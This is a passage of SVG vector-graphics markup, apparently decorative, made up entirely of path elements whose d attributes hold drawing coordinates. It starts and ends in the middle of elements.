d=\"M738.1,23.9c-1.8-.7.8-.5-2.5-1.2C732.6,22.5,739.1,24.3,738.1,23.9Z\"></path>\n        <path d=\"M846.8,41.2c-.8.2,4.8,1.7,4.4,1.2C846.9,41.9,851.1,41.8,846.8,41.2Z\"></path>\n        <path d=\"M839.8,40.7c3.3.6,1.9,0,5.1.6-.6-.3.9-.4-1.3-.8C845.2,41.4,840,40.4,839.8,40.7Z\"></path>\n        <path d=\"M772.5,29.2c-1.9.3,10.2,2,5.3.9C777.6,30.6,774.4,29.5,772.5,29.2Z\"></path>\n        <path d=\"M757.7,26.5c-.3-.2.2-.4-1.3-.7-.7,0-2.7.4-.8.4.1-.4,4.1,1,4.1.6Z\"></path>\n        <path d=\"M763.2,25.9a1.82,1.82,0,0,0-1.1-.2c4.2.8-.1.3.3.7,3.4.4,3.1-.2,8.1.7-2.1-.3-1.5-.6-4.3-.9C766.5,26.4,765.3,26.3,763.2,25.9Z\"></path>\n        <path d=\"M774.2,24.6c-1,.2,2.2.5,2.5.7.2,0,.5-.1.7-.1C776,25,775.1,24.8,774.2,24.6Z\"></path>\n        <path d=\"M776.7,25.3a.37.37,0,0,0-.3.1h.2C776.7,25.4,776.7,25.4,776.7,25.3Z\"></path>\n        <path d=\"M768.8,23.4c-2.8.1-1.2.2-.4,1.2,5.6,1.1,3.4,1,8.8,2.4-2.4-1-2.2-1.3-.9-1.5-2-.4-2.1-.6-4.2-1-.7.3,3.4,1.2-.7.7C768.1,24.1,773.5,24.3,768.8,23.4Z\"></path>\n        <path d=\"M752.7,22.1c-4.3-1.2-3.1-1.9-8.1-2.8C747.3,20.3,748.1,21.1,752.7,22.1Z\"></path>\n        <path d=\"M847.2,35.8c2.5.5,1.3.7,3.4,1.1.7-.4-2.4-1.2,1.5-1C849,35.5,849.5,36.1,847.2,35.8Z\"></path>\n        <path d=\"M744.4,18.9c1.4.2,2.3.4,3.2.6.3-.4-.8-.8-3.5-1.4C745.7,18.7,747.1,19,744.4,18.9Z\"></path>\n        <path d=\"M736.1,17.6a10.11,10.11,0,0,1,3,.3c1,0,.8-.3,1.8-.3a17.84,17.84,0,0,1-3.3-.8c-1.9-.1.6.4,1.3.8C738.3,17.6,732.9,16.9,736.1,17.6Z\"></path>\n        <path d=\"M874.1,39.7c.6-.5-1.7-1.3.4-1.3-2-.1-9.5-1.1-5.8,0C871.1,38.4,872.5,39.3,874.1,39.7Z\"></path>\n        <path d=\"M819.1,29.6c-1-.2-2.1-.3-3.1-.5,1.1.4.6.7,2.4,1.1-.3-.3,1.1-.1.8-.3a10.32,10.32,0,0,1-2.2-.5A12.34,12.34,0,0,0,819.1,29.6Z\"></path>\n        <path d=\"M745.7,17.5c-.4.2,2.1,1.1,3.4,1-1.9-.3-2.5-.6-2.3-.8,1.4.2,2.3.4,3.2.6C749.7,17.8,747.5,17.7,745.7,17.5Z\"></path>\n        <path d=\"M1115.1,77.7a10.78,10.78,0,0,0-1.8-.2c.2,0,.5.1.7.1,3,.6,7.3,1.9,1.6.7.1.4,5,1.1,6.5,1.5-.3-.4-2.6-.9-3.5-1.4C1118.1,78.7,1116.6,78.1,1115.1,77.7Z\"></path>\n        <path d=\"M759.6,18.2c1.6.2,3.9.7,4.1.6-1.9-.3-2.5-.6-2.3-.8-6.8-1.3-6.8-1.5-12.8-2.6-1.4-.2.1.4-1.9.1-1.7-.4,1.5-.5-3.5-1.4,3.4,1.5.5,1.8,3.2,2.8,0-.2,4,.7,5.3,1-.3-.6,4.8,0,.4-1.2,3.8.6,7.8.9,9.5,1.7C760.8,18.3,759.6,18,759.6,18.2Z\"></path>\n        <path d=\"M909.6,43c.9.1,2,.3,3.1.4,2.4.3,4.3.5.8-.2a1.67,1.67,0,0,1-.8.1c-.7-.1-1.3-.4-.3-.4a19.06,19.06,0,0,0-3.1-.4,10.32,10.32,0,0,1,2.2.5C910.2,42.8,909.4,42.8,909.6,43Z\"></path>\n        <path d=\"M849.5,32.8c-.4-.5,4.6.3,5,0-1.6-.5-2.5-.3-3.2-.6-1.1-.7,3.4-.1,1.5-.9a7.46,7.46,0,0,1-2.1-.3C851.5,31.8,848.9,32.2,849.5,32.8Z\"></path>\n        <path d=\"M763.1,17.3c-1.2-.2-1.2-.4-1.2-.5-4.4-.6-3.1-1-6.5-1.5C755.9,15.7,761.8,17.1,763.1,17.3Z\"></path>\n        <path d=\"M737.2,11.7c-1.9-.1-.3.7,1.5,1.1C735.7,11.8,741.3,12.5,737.2,11.7Z\"></path>\n        <path d=\"M740.4,12.3c.6.1,1.2.2,1.1.3,3.5.7.6-.3,4.1.5,1.4.4.5.7,2.5,1.2-1.4-.6,1.5,0,1.9-.1-2.3-.4-.7-.5-1.3-.8a64.57,64.57,0,0,0,7.3,1.2c-2.4-.8.3-1-1.6-1.3-1.7-.1,0,.8-4.9-.1.8,0,1.2-.1.8-.4-3.6-.5-8.2-.8-5.8,0-2.9-.5-2.2-.6-4.2-.7A.3.3,0,0,1,740.4,12.3Z\"></path>\n        <path d=\"M757.6,13.9c-2.3-.1,1.2.9,2.6,1.4C761.8,15.4,758.3,14.4,757.6,13.9Z\"></path>\n        <path d=\"M876.6,33.6c-.5-.1-1.2-.3-1.6-.4a8.65,8.65,0,0,0,1.6.2c2.7.4,4.9.4,3.4-.1-1.1-.1-2.2-.1-3.3-.2-1.4-.1-2.9-.2-4.7-.4,1.2.3,3.2.6,4.6.9.2.2.5.2.7.3S877,33.8,876.6,33.6Z\"></path>\n        <path d=\"M747.1,12.1c4.4.7,2.2-.1.7-.5-2.5-.3-4.5-1.1-5.3-.9C746.2,11.3,748.6,12,747.1,12.1Z\"></path>\n        <path d=\"M895.6,29.6c.7-.7,0-1-2.9-2,.9.6,1.1.6-.7.7C899,29.4,890.9,28.7,895.6,29.6Z\"></path>\n        <path d=\"M865.9,23.9c-1.3-.8,3.2-1.1-3.1-2.5C866.6,22.6,861.7,22.6,865.9,23.9Z\"></path>\n        <path d=\"M880.3,21.7c0,.3,1.8.6,2.4,1-3.9-.6,1,.7-3-.3,2.9.8-1.5.5,1.6,1.3,0-.1.1-.1,1,.1.6.1,1.2.2,1,.1-1.2-.2-1.2-.4-1.2-.5,3.6.8,3.9.7,4.1.5,2.3.5,6.3,1,5.5,1.4,4.2.5,5.2.1,7.8.2-4.9-.8-4.2-.1-9.1-.8.8-.3-5.9-1-5.5-1.4-.2-.6,4.5.7,4,.2-.3-.4-3.3-.3-3.2-.6,3.4.4-2.3-.7-1.3-.8.6.1,3.9.4,4.2.7s-1.3,0-1.9,0c1.8.3,3.3.6,4.2.8-.4-.5.6-1.1-5-2.4-2.4-.1,1.7.5,1.3.8-4.2-.4-5.9-.8-3.3-.9-4.3-.7-3.4,0-.7.7a10.11,10.11,0,0,0-3-.3c1.2.2,3,.5,3.2.6s-.7.2-1.9,0c-1.3-.4-2.8-.8-4.4-1.2l-1.1-.3c-.9-.1-.1.3,1.1.6C878.1,21.3,879.6,21.7,880.3,21.7Z\"></path>\n        <path d=\"M876.4,21.6c-3.5-.5-6.6-.9-7.1-.6C871.9,21.2,875.2,21.7,876.4,21.6Z\"></path>\n        <path d=\"M886,15.3c-.7-.5-4.2-1.5.5-1-5.9-.9-4.2-1.4-6.8-2.1-5.6-.6,6.1,2.1-.3,1.4-.2-.2-.5-.3-2.2-.6h0c-.9.4,2.4,2-5.4.9,3.8,1,3.7,1.2-.7.7,2.4.4,4.4.6,6,.8a21.86,21.86,0,0,0,4.2.2c.2.2,3.5.7,3.3.9a25.55,25.55,0,0,0-2.9.1c1.8.3,3.3.6,4.3.8.7-.2-1.6-.6-1.3-.8,1.5.3,1.9.5,3.3.8.5-.3-2.5-.8-2.5-1.2a39.07,39.07,0,0,1,4.3.9c-1.9.3,7.6,2.4,4,2.3,4.3.5,1.1-.5,2.6-.6-.7-.3-5-.8-5.4-1.1-.1-.1-.1-.2-.2-.4a35.54,35.54,0,0,1,7.5,1.6c2.3.1-3.2-1-3.5-1.4,1.1,0,.6-.4,4,.2,2.1.5,5,1.1,6.6,1.6-2.4-.4-4-.7-5.3-1-.4.6,3.5.7,4.5,1.3.2.5-1.3.4-2.7.4,1.2.2,3,.5,3.2.6-5.1.3-1.7,2.6-7.4,2.9-1.2-.2-1.2-.4-1.2-.5a37.31,37.31,0,0,0-4.1-.5c2.8.7,7.2,1.6,10.8,2.3.5.6-3.5-.6-4-.2,2.6.7,5.1.8,8.4,1.4-3.3-1,.3-.8-3.7-1.7-1.1-.1-.1.4-3-.2a37.58,37.58,0,0,1,6,.3c-1.3-.6-1.5-1.2-.6-1.2,2,.1,2.1.4,4.3.8.6-.4-5.1-1.1-4.5-1.4,2,.3,3.5.5,4.1.5-7.2-1.1,4.7,0-1.6-1.3-1.4-.1-.2.5-2.9.1-.7-.8,2.7-.4,4.6-.5-1.2-.2-3-.5-3.2-.6,4.4.3-.8-1.2,2.1-1.6-4.9-.8-2.2-.7-2.4-1.1-3.3-.6-3-.3-6.2-.9,1.9.8-.5.1-4-.2-1.6-1-6.6-2.2-10.2-3.3C886.2,14.4,889.8,15.6,886,15.3Z\"></path>\n        <path d=\"M911.8,26.9c.9.1-.1-.3,1.4-.1.5.1,1.3.2,2.6.4,0,.2.5.5,1.2.4,0-.2-.6-.3-1.2-.5-1.1-.2-1.9-.3-2.6-.4a25.93,25.93,0,0,1-3.7-.6C909.8,26.3,908.7,26.5,911.8,26.9Z\"></path>\n        <path d=\"M869,18.1c3.1.5,7.9,1,6.1.6-1.9-.2-2.7-.2-5.1-.5-.2-.2,0-.4-2.3-.7C867.6,17.7,869,17.9,869,18.1Z\"></path>\n        <path d=\"M889.3,20.3a19.07,19.07,0,0,0,2,.2,2.71,2.71,0,0,0,1.2.4c0-.5,1.8-.6-3.7-1.6C890.9,20,889.2,20.2,889.3,20.3Z\"></path>\n        <path d=\"M876,16.6c-3.7-.6-3.1-.1-5-.3a18.2,18.2,0,0,0,3.1.5C871.2,16.2,877.4,17.2,876,16.6Z\"></path>\n        <path d=\"M913.4,17.7c1.3.3.8.4,0,.3a12.05,12.05,0,0,0-1.9,0,7.14,7.14,0,0,0,1.9.2,10.53,10.53,0,0,1,3.3.5,10.36,10.36,0,0,0-2-.2c6.7.9,1.3-.3,2.6-.6a24.13,24.13,0,0,0-3.8-.4,4.87,4.87,0,0,1-1.2-.1C912.7,17.5,913.1,17.6,913.4,17.7Z\"></path>\n        <path d=\"M870.1,10.2c3.7.9-.8.5,4.5,1.4-.4-.3-2.3-.8-.3-.7C872,10.7,870.2,9.9,870.1,10.2Z\"></path>\n        <path d=\"M874.2,10.7c1.2.2,2.1.5,3,.7,1.2.3,2.5.6,4.5,1-.1-.2-.1-.3-.2-.5-1.1-.2-3.1-.5-4.3-.7-.6-.1-1-.2-1-.3a1.56,1.56,0,0,0,1-.1.18.18,0,0,0,0-.27h0a2.37,2.37,0,0,0-1.4-.5C873.5,9.9,877.5,11.1,874.2,10.7Z\"></path>\n        <path d=\"M879.6,9.8a7.46,7.46,0,0,0-2.1-.3c1.2.3,7.4,1.8,6.5,1.4-3-.6-.4-.6.8-.4a15.73,15.73,0,0,1-3.3-.8C879.6,9.5,883.1,10.3,879.6,9.8Z\"></path>\n        <path d=\"M910.2,11a12.17,12.17,0,0,1,3.4.4,41,41,0,0,0,4.9.9c-.2-.3-2.7-.8-4.9-1.1S909.6,10.6,910.2,11Z\"></path>\n        <path d=\"M928.2,103.9c-3.3-.6-1.9,0-5.1-.6-1-.6,1.3-.2.7-.7-.5-.2-4.4-1.2-5.3-1,3.5.8.2.7.5,1.1a17.84,17.84,0,0,1,3.3.8C922.3,103,929.9,104.9,928.2,103.9Z\"></path>\n        <path d=\"M761.4,34.5c3,.4,3.2.4,6.3,1l-.3-.6c-2.8-.7-3.6-.5-5.3-1,.2-.2,1.7,0,4.1.5a12.72,12.72,0,0,0-4.7-1.7C762.7,33.6,758.4,33.2,761.4,34.5Z\"></path>\n        <path d=\"M824.9,41.9c0-.1.8,0,1.1.2a2.71,2.71,0,0,0,1.2.4c-.1-.7,3.2.1,4.7-.2-4.6-.9-5.8-.8-8.3-1.2C824.2,41.4,822.6,41.5,824.9,41.9Z\"></path>\n        <path d=\"M818.7,34.9c-4.2-.4-.4.7,1.5,1.3a7.45,7.45,0,0,1-2-.1c-1.7-.4,0-.5-3.4-1,1.5,1,.4,1-.3,1.4,4.3.2,6,1.2,9.4,1.6-3.5-.8,6.1.5,1.7-.5-1.7-.1-4.3-1.2-2.5-1.2-1.5-.5-3.8-.5-4.3-.8-1.6-.7,1.9-.2,4,.3a49.92,49.92,0,0,0-8.7-2.1C813.7,34,818.2,34.5,818.7,34.9Z\"></path>\n        <path d=\"M793.3,30.3c-8.2-1.2-3.4.8-4.1,1.5a7.13,7.13,0,0,1,3,.5c-3.3-.1,2.2,1.6,2,2.1.9-.4,2.2-1.1-1-2,2.7.3,1.8-.1.7-.6,1.8.3,3.3.6,4.3.8a36.07,36.07,0,0,0-8-2.5C791.9,30.3,793.9,30.7,793.3,30.3Z\"></path>\n        <path d=\"M1701.8,92.1c1.7-.2,3.8-.5,1.8-1h-1.7c-3.4.2.2,1.2-7.4.6,2.7.7,4.2.9,1.4,1.6,5.8.2,4.8-.3,6-.5.1,0,.2-.1.4-.1h-.4C1699.1,92.5,1700.2,92.3,1701.8,92.1Z\"></path>\n        <path d=\"M1676,91.4c-3.6-.4,0-.6-6.3-.8C1670.3,90.9,1671.3,91.2,1676,91.4Z\"></path>\n        <path d=\"M1697.2,91.7c1-.3,4.5-.5-.8-.9C1697.5,91.1,1692.8,91.4,1697.2,91.7Z\"></path>\n        <path d=\"M1669.2,85.2a66.58,66.58,0,0,1,7.2.3c-1.9-.4,2-.2,2.4-.4C1675.3,84.8,1673.1,85.2,1669.2,85.2Z\"></path>\n        <path d=\"M1676.8,84.4c-.5.3-2.4-.2-4.4-.2a25.42,25.42,0,0,1-3.9.3c3.5.1,6.8.1,8.6.3C1675.7,84.6,1681.1,84.6,1676.8,84.4Z\"></path>\n        <path d=\"M1649.6,83.4c-2.5,0-4.4-.1-5.8-.2.4.3,1.3.5,3.4.7C1645.7,83.6,1649.2,83.6,1649.6,83.4Z\"></path>\n        <path d=\"M1653.4,81.5c-3,0-3-.8-4.6-.5,3.4.6-11.6,0-5.1.5C1646,81.2,1649.8,81.7,1653.4,81.5Z\"></path>\n        <path d=\"M1663,81.3c-2.6.1-6.4,0-6.7.3C1661,81.8,1663,81.7,1663,81.3Z\"></path>\n        <path d=\"M1656.4,80.1a37.64,37.64,0,0,1-4.5-.3c1.4.5-1.4,1.2,4,1.4C1656.5,80.7,1654.9,80.5,1656.4,80.1Z\"></path>\n        <path d=\"M1697.3,80.8c-.4.3-7.1.6.8.9C1695.7,81.3,1701.4,81.1,1697.3,80.8Z\"></path>\n        <path d=\"M1689.9,77.1c.2-1.1,1.6-1.1,3.6-2.2-7.2-.1-7.7,0-2.4.5-2.7-.1-3,.1-5.6,0C1690.9,76,1683.8,76.9,1689.9,77.1Z\"></path>\n        <path d=\"M1695.3,73.8c-5.3,0-4.4.6-6.1,1C1695.7,74.8,1694.2,74.2,1695.3,73.8Z\"></path>\n        <path d=\"M1424,67c-5.6-.2-1.5,1.4-.4,1.1C1423.5,67.5,1423.1,67.5,1424,67Z\"></path>\n        <path d=\"M1644.3,71.1c-.3-.1-.6-.3-3-.3-.6.5,10,.7,10,.3C1647.2,71,1647.7,71.2,1644.3,71.1Z\"></path>\n        <path d=\"M1448.2,66.1c0-.4,1.8-.7,1.8-1.2C1446.3,65,1444.3,66.1,1448.2,66.1Z\"></path>\n        <path d=\"M1696.8,70.8c.2-.4,2.6-1-1.3-1.4C1695.3,69.9,1691.7,70.2,1696.8,70.8Z\"></path>\n        <path d=\"M1473.3,64.6c2.5,0,3.4.2,3.1.4,1.4,0,2.8.1,4.3.1C1481.5,64.8,1475.4,64.4,1473.3,64.6Z\"></path>\n        <path d=\"M1460.1,63.8c.9,0,1.6,0,1.3-.1-5.2-.3,3.9-.1.9-.5-3.4.1-6.2-.5-7.1-.2,2.2.2,4.2.6,2,.7C1458.2,63.7,1459.1,63.8,1460.1,63.8Z\"></path>\n        <path d=\"M1642.1,67c-.6.5,7.3.4,10,.3C1648.7,67,1645.1,67.3,1642.1,67Z\"></path>\n        <path d=\"M1649.2,64c-7.8.1-8,.9-5.7,1.4,4.5-.1,4.3-.6,7.6-.8-4.8-.5-2.8.3-5.3.3-.1-.1-1.3-.2-1.6-.3C1645.6,64.4,1649.5,64.4,1649.2,64Z\"></path>\n        <path d=\"M1656.6,64.6c0,.1-.1.1-1.3.1-.1-.2-1.3-.3-3.1-.4,1,.2-1.1.7,2.1.8l-.3-.3C1657,65,1660.6,64.8,1656.6,64.6Z\"></path>\n        <path d=\"M1647.3,63.5c.9-.1,0-.8-2.3-1a26.77,26.77,0,0,1-4.2,0C1639.7,63.1,1645,63.2,1647.3,63.5Z\"></path>\n        <path d=\"M1499.7,58.4c4.8.2,7.4-.4,2.2-.6C1500.1,57.8,1501.6,58.3,1499.7,58.4Z\"></path>\n        <path d=\"M1645.4,61.3c-1.1-.3.2-.4,4-.2-2-.2-1.5-.3-.5-.4,1.8,0,3.7.1,5.5.1-.2-.3,2.8-.2,4-.4a8.61,8.61,0,0,1-2.3-.4,20.74,20.74,0,0,0,5.1.3c1.4-.1,1.6-1.2-3.7-1.1,3.4.1,1.3.5-1,.4-1.52-.24-3.06-.41-4.6-.5.3.1-.8.4-.4.6a27.34,27.34,0,0,0-3-.1c.2,0,.3.1.4.1-3.7-.5.4-.9,3.8-1.3-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8.9.8,2.8,1.3.3,2,1.6,0,4.4.4,5.4.3.2.1-.2.2-1.6.2h.3C1643.8,60.4,1640.9,61,1645.4,61.3Z\"></path>\n        <path d=\"M1680,59.6c1.6.5-.5.8,3.6,1-1.3-.4,1.9-.7,5.2-.4C1687.3,59.4,1683.7,60.1,1680,59.6Z\"></path>\n        <path d=\"M1695.3,59.6c1.7,0,4,.1,4.2,0-3.7-.2,3.4-.3,2.2-.6-4.9.1-1.2-.4-4.6-.4C1698.8,59.1,1696.5,59.3,1695.3,59.6Z\"></path>\n        <path d=\"M1653.3,57.7c-.1-.3,5.4,0,5.3-.3-2.4-.1-4.7-.1-7.1-.2C1651.5,57.5,1649.1,57.5,1653.3,57.7Z\"></path>\n        <path d=\"M1602,54.7c1.9.4-2.7.3-3.8.5a37.51,37.51,0,0,1,4.5.3C1603.9,55.4,1605.1,54.8,1602,54.7Z\"></path>\n        <path d=\"M1575.4,54.4c-1-.4,3.6-.2,3.8-.5-2,0-3.2-.1-4.4-.2C1576.6,54,1570.9,54.1,1575.4,54.4Z\"></path>\n        <path d=\"M1675.5,56.1c-.4.2-5.4,0-3.9.4C1676.2,56.7,1679.4,56.3,1675.5,56.1Z\"></path>\n        <path d=\"M1647.1,55.3c-1.6-.4,3.5-.1,3.9-.3-4.4,0-3.6-.3-5.9-.4C1644.3,54.9,1644.1,55.1,1647.1,55.3Z\"></path>\n        <path d=\"M1583,53.6c2.3.1,1.1.3,3.1.4-2.4-.4,7.7-.1,2.3-.5C1589.7,53.8,1581.7,53.2,1583,53.6Z\"></path>\n        <path d=\"M1509.8,50.9c1.1,0,1.8.1,2.3.1-.8.1-.5.2-1.3.3,2.4-.1,2.1.1,2.2.3s.2.3,1,.4c-5,.1-2.2.9,1.1,1.2-.1,0-.1,0-.2-.1.8.1,2.1.2,4,.3-1.8-.1-2.3-.3-2.7-.6.6,0,1.1-.1.7-.2-.9-.3-4.9-.5-2.7-.7a2.08,2.08,0,0,1,.7.1l.9-.3c1,0,.8-.1.2-.1,1.1-.6,1-1.3-4.5-1.8-4.1.2,3.1.7,2.4,1.1C1512.3,50.9,1509.9,50.8,1509.8,50.9Z\"></path>\n        <path d=\"M1654.3,54.1c-3.9-.1-5.2.5-2.1.7C1652.1,54.5,1654.3,54.4,1654.3,54.1Z\"></path>\n        <path d=\"M1687.5,55.5c.3-.4,1.3-.5-3.4-.7C1685.1,55,1682.5,55.5,1687.5,55.5Z\"></path>\n        <path d=\"M1557.1,52.6c.6-.2,3.2-.2,2.2-.6C1556.1,51.9,1552.2,52.4,1557.1,52.6Z\"></path>\n        <path d=\"M1683.5,52.6c-5-.2-2.6.8-.6.9C1685.3,53.1,1682.1,52.9,1683.5,52.6Z\"></path>\n        <path d=\"M1651.7,48c.8-.4-3.7-.6-.7-.8C1646.5,47,1647.4,48.1,1651.7,48Z\"></path>\n        <path d=\"M1700.6,46.7c1,.2-1.1.6,2,.7-.3-.1,0-.1.4-.2.9-.1,2.3-.3,0-.4C1702.5,46.8,1701.7,46.8,1700.6,46.7Z\"></path>\n        <path d=\"M1624.1,43.5c-3-.2-5.8-.4-8.8-.5C1614.6,43.3,1623.2,43.6,1624.1,43.5Z\"></path>\n        <path d=\"M1673.4,42.6c-2.2-.5,4.5-.2,5.2-.4C1674.7,41.7,1666.6,42.4,1673.4,42.6Z\"></path>\n        <path d=\"M1579.2,38.2c7.9.5,5.3.9,8.1,1.3.2-.3,6.7.1,5.3-.3-6.3,0-4.1-.5-6.3-.8C1582,38.3,1583.6,38.4,1579.2,38.2Z\"></path>\n        <path d=\"M1590.9,38.9c2,.1,2.5.2,4.4.3a4.17,4.17,0,0,1-1.1-.3c2.4,0,3.7.5,5,.2-2.4-.4-1.9-1.1-6.1-1.3a15,15,0,0,0,1.5.4C1591.1,38.2,1590.1,38.5,1590.9,38.9Z\"></path>\n        <path d=\"M1588.2,37.4c4.5.2-3,.5,3.4.7C1593.9,38,1591.6,37.2,1588.2,37.4Z\"></path>\n        <path d=\"M1648.6,87c5.3.2,13.1.2,9.6-.1C1657.6,87.4,1648.9,86.5,1648.6,87Z\"></path>\n        <path d=\"M1686.1,83.8c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6-4.6-.2-2.7.2-5.4.2-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.16,17.16,0,0,1,5.2-.4C1684.7,83.9,1685.9,84,1686.1,83.8Z\"></path>\n        <path d=\"M1684.2,80.1a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8-4.2.2-4.2-.3-5.7-.1,3.2,1,2.4,1.5-5.3,1.8C1681.7,79.6,1683.7,79.8,1684.2,80.1Z\"></path>\n        <path d=\"M1697.4,73.1c-4.4-.2-3,.7-2.3.6C1696.3,73.5,1698.9,73.5,1697.4,73.1Z\"></path>\n        <path d=\"M1646.8,72.4l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C1642.1,71.8,1644.9,72.3,1646.8,72.4Z\"></path>\n        <path d=\"M1696.6,69a24,24,0,0,0,5.8-.2h2.4c3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-1.6.1-1.6.4-3,.5-.7,0-1.8,0-3.6-.1C1699.9,68.8,1694.7,68.6,1696.6,69Z\"></path>\n        <path d=\"M1456.3,62.7c.8-.1,2.8-.1,5.5-.1a29.78,29.78,0,0,0-4.7-.7C1461.5,62.4,1452.3,62.7,1456.3,62.7Z\"></path>\n        <path d=\"M1537.7,60.5c-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2-1.7-.4,6.7-.4,2.1-.8a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3C1534.9,59.6,1535.2,60.2,1537.7,60.5Z\"></path>\n        <path d=\"M1663.5,62.9c1.9,0,3.8.1,5.7.1C1670.4,62,1668.7,62.8,1663.5,62.9Z\"></path>\n        <path d=\"M1529.9,58.1a123.6,123.6,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2-8.4-.2.9-1-5.6-1.7-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4a24.44,24.44,0,0,0-4.1-.2,1.54,1.54,0,0,0-.8-.3c.3-.1.4-.1.4-.2,2.7,0,6.8.1,9,.3-.7-.4.3-1-3.1-1.5,3.4,1.1-.1,1.2-5.9,1.1-.4-.5-3.4-1.2,2.3-1.6-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1a5.6,5.6,0,0,1,.7-.2c-5.1,1,.6,2.5-2,3.4-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4C1537.9,58.3,1532.2,58,1529.9,58.1Z\"></path>\n        <path d=\"M1508.8,54.5c-.6-.5-.4-1,3.2-1.1-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3C1512.5,53.4,1503.4,54.1,1508.8,54.5Z\"></path>\n        <path d=\"M1515,53.7c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C1518,54.2,1519.1,53.8,1515,53.7Z\"></path>\n        <path d=\"M1662.7,57.3c1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2,3.2.2-1.8.5,3.4.7C1658.9,56.8,1660.7,57.3,1662.7,57.3Z\"></path>\n        <path d=\"M1664.9,55.1c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C1666.7,54.8,1660.8,54.9,1664.9,55.1Z\"></path>\n        <path d=\"M1645.6,52c4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.5,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6.4-.2,2.8-.2,2.3-.5-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1.1,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4C1650.4,51.7,1648.9,52,1645.6,52Z\"></path>\n        <path d=\"M1614,47.7c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C1613.7,48.5,1613.3,48.1,1614,47.7Z\"></path>\n        <path d=\"M1651,45.6c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C1651.5,44,1658.2,46.5,1651,45.6Z\"></path>\n        <path d=\"M1670.6,44.2c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C1669,45.3,1671.4,44.4,1670.6,44.2Z\"></path>\n        <path d=\"M1593.1,46.2c-5.8,0-.2-.6-6.1-.6C1586.1,45.9,1593.8,46.6,1593.1,46.2Z\"></path>\n        <path d=\"M1676.8,44.9c2.8-.2.3-.7-3.5-.8C1677.4,44.4,1673.9,44.5,1676.8,44.9Z\"></path>\n        <path d=\"M1586.5,40.2c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C1588.8,39.7,1589.6,40.1,1586.5,40.2Z\"></path>\n        <path d=\"M1556.4,48.6c.9.2-1.2.5,1.9.6-.1-.1,1-.1,1.4,0a4,4,0,0,0,1.6.3c-.3-.7,4.2-.4,6.2-.8C1561.3,48.4,1559.8,48.6,1556.4,48.6Z\"></path>\n        <path 